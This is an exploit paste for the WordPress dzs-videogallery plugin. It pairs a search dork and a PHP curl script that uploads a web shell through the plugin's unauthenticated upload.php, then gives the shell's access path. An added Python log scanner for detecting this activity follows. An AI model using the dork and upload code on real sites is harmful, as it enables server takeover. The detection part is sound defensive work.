- Dork : inurl:/wp-content/plugins/dzs-videogallery/ site:org/uk/co/com/fr/net
- CSRF:
```php
<?php
$uploadfile="";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file_field'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
```
- Shell Access: http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/yourshell.php
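
For defenders, the two paths in this paste are enough to hunt for this activity in web server access logs. The following is an added example, not part of the original paste: it assumes Apache/nginx "combined" log format, and the function names, script-extension list and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the paste above.
UPLOADER = "/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php"
UPLOAD_DIR = "/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/"
# Extensions a server may hand to PHP (assumed list; includes double extensions like x.php.jpg).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Apache/nginx "combined" access log line (assumed format).
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')

# Constructed sample input (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "POST ' + UPLOADER + ' HTTP/1.1" 200 31 "-" "curl/8.0"',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET ' + UPLOAD_DIR + 'x.php HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.4 - - [12/Mar/2024:10:05:00 +0000] "GET ' + UPLOAD_DIR + 'clip.mp4 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2024:10:07:00 +0000] "GET ' + UPLOAD_DIR + '%74.PhP HTTP/1.1" 404 0 "-" "-"',
]

def scan(lines):
    """Return (kind, ip, timestamp, normalised_path) for each suspicious request."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Decode and normalise so %-encoding, letter case and '//' do not evade the match.
        path = re.sub(r"/+", "/", unquote(m["uri"].split("?", 1)[0])).lower()
        status = int(m["status"])
        if m["method"] == "POST" and path == UPLOADER and status < 400:
            findings.append(("upload_post", m["ip"], m["ts"], path))
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path[len(UPLOAD_DIR):]):
            kind = "script_served" if status == 200 else "script_probe"
            findings.append((kind, m["ip"], m["ts"], path))
    return findings

def chained_sources(findings):
    """IPs that posted to the uploader and were then served a script from its upload directory."""
    uploaded, chained = set(), set()
    for kind, ip, _ts, _path in findings:
        if kind == "upload_post":
            uploaded.add(ip)
        elif kind == "script_served" and ip in uploaded:
            chained.add(ip)
    return sorted(chained)

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any `script_served` hit means a script file already sits in the plugin's upload directory and should be treated as a compromise indicator for that host, whether or not the uploading request is still in the retained logs.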